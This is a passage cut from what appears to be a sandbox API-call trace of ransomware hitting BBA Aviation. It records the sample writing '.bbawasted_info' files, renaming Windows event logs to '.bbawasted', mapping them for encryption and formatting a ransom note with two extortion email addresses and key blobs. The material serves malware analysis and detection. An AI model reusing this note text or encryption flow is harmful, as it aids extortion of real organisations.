KEY:\r\n[begin_key]GHXvYaz4kSCkDhaRfunIcoru4AXLNn80HUiZWDm8ztvSSnfT8r9AeKSH+EuUtc4/\r\nr+n5tF0R0Qc4RowYh142TA7bd+wF97kcvhVV0JcrAeHW+osFdtPmnwMlJmt0siSP\r\nVD2U+G9nNJjNUYGbvHeSPwAgFildsDV7hPIE4prwuZYL5gDpN/sv89WeRtTn5eDF\r\nV/qaxiIyu6breQr+lLIp/yp2ZWQjDrEsGrx0b0p+SuNSnyhOKUHwk22o3ThsyRR3\r\n5kJLaCyXh3lzxlAepxd3XlazO+tIRoiZMQk+lv7qD43fAf+pN2Ub3R53dPfL66l4\r\nSxXu7he4O1dQ8lOMqID72dze5LaJG6Op62F+JCUmCuggN6fylINMag2rV8v4SQry\r\nNbYq4glXCDhechw8csXtFIn5dXm2DWkJLGBg3ZX/JKougCXvWt182CDXQWU2VF/1\r\nyhtP6VSLAXdyDRNQohkWIMfi574k7auYboEbZXtpElFWx2zOCXPRhbMCYl7r+JGz\r\n0Lv2WZ14Fv+AcnWWeBCDHP/cp8TQkDsE5dces/JFElZyxzvQfCQlNUhV5Sml4zt6\r\nR8o2rYf+ftZAV2YtWvds2h1taVHSap00O6CXknm8cryg84Unh6SpZ/OtpLSpDtqW\r\nb+EnpwdNUqxFsw5i6bwTqcMVAlq9/Y8tR5EdCj0TTgU=[end_key]\r\nKEEP IT\r\n") returned 984 [0198.065] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0198.065] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0198.065] SetEndOfFile (hFile=0x28c) returned 1 [0198.068] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.068] CloseHandle (hObject=0x28c) returned 1 [0198.115] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0198.116] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69fc48 | out: hHeap=0x660000) returned 1 [0198.116] _aulldvrm () returned 0x0 [0198.116] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6c58) returned 1 [0198.117] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0198.117] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0198.117] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx") returned 68 [0198.117] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x292) returned 0x6aecf0 [0198.118] lstrcpyW (in: lpString1=0x6aed78, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0198.118] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.118] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6790) returned 1 [0198.119] CryptGenRandom (in: hProv=0x6a6790, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0198.119] CryptReleaseContext (hProv=0x6a6790, dwFlags=0x0) returned 1 [0198.119] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0198.120] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0198.122] SetEndOfFile (hFile=0x28c) returned 1 [0198.122] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.122] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.122] lstrcpyW (in: lpString1=0x6aed78, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0198.122] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx.bbawasted")) returned 1 [0198.123] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-User Profile Service%4Operational.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-user profile service%4operational.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0198.123] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0198.124] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0198.124] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0198.124] CloseHandle (hObject=0x294) returned 1 [0198.156] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0198.157] CloseHandle (hObject=0x280) returned 1 [0198.157] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0198.157] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a65f8) returned 1 [0198.158] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0198.158] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0198.159] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a62c8) returned 1 [0198.159] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0198.159] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0198.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0198.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0198.172] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.172] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]o7jlHcJlivfPFKbGQjQyRp/EeupFSzP4ddreHBefONCz4U5/glbQ0Ft4KCStyqV0\r\nnQlDf6g0Whq47hMfpkqN7qax6nqxKxu6GTHr0vPRpFZbYJkOPZ1WI3aTE5DdY2Uv\r\npNUSOfKAM4qAzoQ6lLs9loKBXbAWhAPzd1PhW4RliARCEG7x2735fzZ4C5zh/wgA\r\n8aMxu3CL8QAWtnOPgB9mGsN5C8yuYlZj3IlVyooSVPvcPlRdUG/PI1nfeADZcsZm\r\neboPBepjN8f7GCfnuwcrSXOOnr82mcVfR/Bj5D2EBEhQgVLuGb0bvA5qJypAlyXK\r\nrBHbJUT/r9YUCMhrP3Jkszt4nyaJ4ZUdEyN8aJgejklMK7z5lDesx7hBCvQS7qhv\r\nzUOMoK9JLrfWVmN8RCIgv1NcNQUtIokLaP9af1ECJ0yBlrO+YinDu2z67BlEBvHg\r\n7fZyQRvAPtthTSvfnfhCIBnmpaFAEqvqmqhPXumFDXivxu7iksnjfIyDMBBikvx8\r\nzAGhgzz+w1t9Z5w5WHJQYjLktr1RSoVzNg5qn9uOu+h+8oBfgvoY/0BHQa+rKmis\r\nXzU+/f/KRFeynKwy8B/je20mRMBhQixnmVUe2QzkZcavGT38FvqAXBq4aVJALgJW\r\nSWUrrxV0uqfQdzokRJttehF7Xv+vqAz1YvF2Cn26xZa=[end_key]\r\nKEEP IT\r\n") returned 984 [0198.172] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0198.172] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0198.173] SetEndOfFile (hFile=0x28c) returned 1 [0198.176] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.176] CloseHandle (hObject=0x28c) returned 1 [0198.236] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0198.237] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69fd10 | out: hHeap=0x660000) returned 1 [0198.237] _aulldvrm () returned 0x0 [0198.237] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6c58) returned 1 [0198.238] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0198.238] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0198.238] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx") returned 56 [0198.238] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27a) returned 0x6aecf0 [0198.239] lstrcpyW (in: lpString1=0x6aed60, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0198.239] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.239] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6020) returned 1 [0198.239] CryptGenRandom (in: hProv=0x6a6020, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0198.239] CryptReleaseContext (hProv=0x6a6020, dwFlags=0x0) returned 1 [0198.239] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0198.241] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0198.242] SetEndOfFile (hFile=0x28c) returned 1 [0198.243] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.243] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.243] lstrcpyW (in: lpString1=0x6aed60, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0198.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx.bbawasted")) returned 1 [0198.244] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4ActionCenter.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-userpnp%4actioncenter.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x280 [0198.245] CreateFileMappingW (hFile=0x280, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0198.245] GetFileSize (in: hFile=0x280, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0198.245] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0198.245] CloseHandle (hObject=0x280) returned 1 [0198.251] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0198.252] CloseHandle (hObject=0x294) returned 1 [0198.252] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0198.252] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a61b8) returned 1 [0198.253] CryptGenRandom (in: hProv=0x6a61b8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0198.253] CryptReleaseContext (hProv=0x6a61b8, dwFlags=0x0) returned 1 [0198.253] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6460) returned 1 [0198.254] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0198.254] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0198.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0198.265] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0198.265] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.266] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JqGQPX1ht9EVhILHKmcV4T3OoTshPwEPPMAWjKnzw+3sjrugoZGIKdIGlrgUku7+\r\ny7WLqHM7t6xtLJm3KW8rRSp1nyWvA1nksSwuZKTJtGQqVZCov677BJOzJMX+Qf/t\r\nwJPU7mbwlqjm07/Z+5pUcscxqGr9kx//pFy6ZPy+Y6Ak7yOwvjaIOOE3pb9K36Pj\r\ng6fY3em+0o9FR8Y/3PLcFxJZoi9Ap/c+mjsYBSirdsl+T+9np3PCdg6sTvlfL/XF\r\ndo8jzt1MPVl8lX72CR34ludsn4man4j6zDWxA0rAR+xmn7cbTdzjbP2rIpEuEBJc\r\nBE+WQCSLIJPIcY+/ExYEgr1nYgjSLzFmjxQxafzqJWXvE8VUtIV6RXMYpclJ6y8B\r\nUlXFKieDGzfMrIrOTtTmW5Gtukkjtmz2gzhU/zU/ZMIIS22/XSxeuOuDuHgHiPNJ\r\nnLjQPaNwFMfg0HG9+t4EPkvEcPjk2j+hwe0MTspkRr0EXKQzCrk59bMlo0JS4j81\r\nqcG0ATK+zsa/bSropRyP8i2yu/mqEMu5nUNVYHDsxV03HJ7dadGhUKgW7tZr+zd4\r\n90WqFCynOE//rUDUiK90QnYdifwApT547u7HmliU+9xjojZRa7zEPJr+p9T4QozN\r\nzBNJpAkvPV4334c/rcnQq07/EyqToOEctxN4U/4/HFw=[end_key]\r\nKEEP IT\r\n") returned 984 [0198.266] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0198.266] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0198.266] SetEndOfFile (hFile=0x28c) returned 1 [0198.269] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.269] CloseHandle (hObject=0x28c) returned 1 [0198.343] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0198.344] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa4a8 | out: hHeap=0x660000) returned 1 [0198.344] _aulldvrm () returned 0x0 [0198.344] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a62c8) returned 1 [0198.345] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0198.345] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0198.345] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx") returned 57 [0198.345] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x27c) returned 0x6aecf0 [0198.345] lstrcpyW (in: lpString1=0x6aed62, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0198.345] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.345] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6a38) returned 1 [0198.346] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0198.346] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0198.346] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.bbawasted_info" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0198.347] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0198.348] SetEndOfFile (hFile=0x28c) returned 1 [0198.348] SetFilePointer (in: hFile=0x28c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0198.348] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.348] lstrcpyW (in: lpString1=0x6aed62, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0198.348] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx.bbawasted")) returned 1 [0198.349] CreateFileW (lpFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-UserPnp%4DeviceInstall.evtx.bbawasted" (normalized: "c:\\logs\\microsoft-windows-userpnp%4deviceinstall.evtx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0198.350] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0198.350] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x11000 [0198.350] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11000) returned 0x640000 [0198.350] CloseHandle (hObject=0x294) returned 1 [0198.362] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0198.362] CloseHandle (hObject=0x280) returned 1 [0198.363] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0198.363] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a69b0) returned 1 [0198.363] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0198.364] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0198.364] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6130) returned 1 [0198.366] CryptGenRandom (in: hProv=0x6a6130, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0198.367] CryptReleaseContext (hProv=0x6a6130, dwFlags=0x0) returned 1 [0198.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0198.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0198.446] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0198.446] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Xmx/oNek8NUNB2NbJxUynYiDTcVG1KcNn5qklUMJZ2NQPOul+SXo6hfEDuVPUc17\r\nsUYx2xfCtCTGvC9DdslFY+4WmzoBMBGV0pZcOLaMBbjdeNuv8jVb3SipzVeN0DE5\r\nPs4PPCFlPNFsRjJlu01130bwt0xBvHbuxNPy2is08oe3AY61AdlVPZufMUzsgaFr\r\niJpk5Dx76rYUQylJj7Rva74feVHRX3rR+Fh7AsIgdZHJ30MajUwy5FxKOoQLiSOW\r\nQdxvdykT2Q1d7/KjzVVWWJ6+Oo2fiF+W0d2w+oa0aQjq7FGF8YD6WJeoOEXKCL/J\r\nQ62zkX+CAoyJ+BFCbeUeqg7oXfnqxcSaYXziqxsfAZHOS4txIwLqiTmpgHFlSFCU\r\nvT6OSYhhDR8PEJJmGwmF6PMsdXovg5UcpitcWIt7xjd0/dGgs3PeFR3OdxOCgTBN\r\n9h+2U7i4NYRflSirEyL95hdMkx29KjGMwJ3XweRSgA+P46aAyrrV4/urkEqfQbVD\r\nsU52OWNAnlAkU3eK1g3kUsbF8OTYqLGfwq34EMocbO3sxWsDBpYkudu7k3vKQSBR\r\nDgZ47+k1eW6Kc4lqfC0I+/SMuudXpb297/CPbJfOv7JTxgTf+MOdukZxgmYIDZMh\r\nUpEA1wPW72X29iDBrFmNggvFe3w4mMCWv4ie1WTqY8n=[end_key]\r\nKEEP IT\r\n") returned 984 [0198.446] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0198.446] WriteFile (in: hFile=0x28c, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0198.446] SetEndOfFile (hFile=0x28c) returned 1 [0198.449] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0198.449] CloseHandle (hObject=0x28c) returned 1 [0198.456] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0198.456] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aa988 | out: hHeap=0x660000) returned 1 [0198.456] _aulldvrm () returned 0x0 [0198.456] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6240) returned 1 [0198.458] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0198.458] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0198.458] lstrlenW (lpString="\\\\?\\C:\\Logs\\Microsoft-Windows-VolumeSnapshot-Driver%4Operational.evtx") returned 69 [0198.458] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x294) returned 0x6aecf0 [0198.458] lstrcpyW (in: lpString1=0x6aed7a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0198.458] RtlAllocateHeap 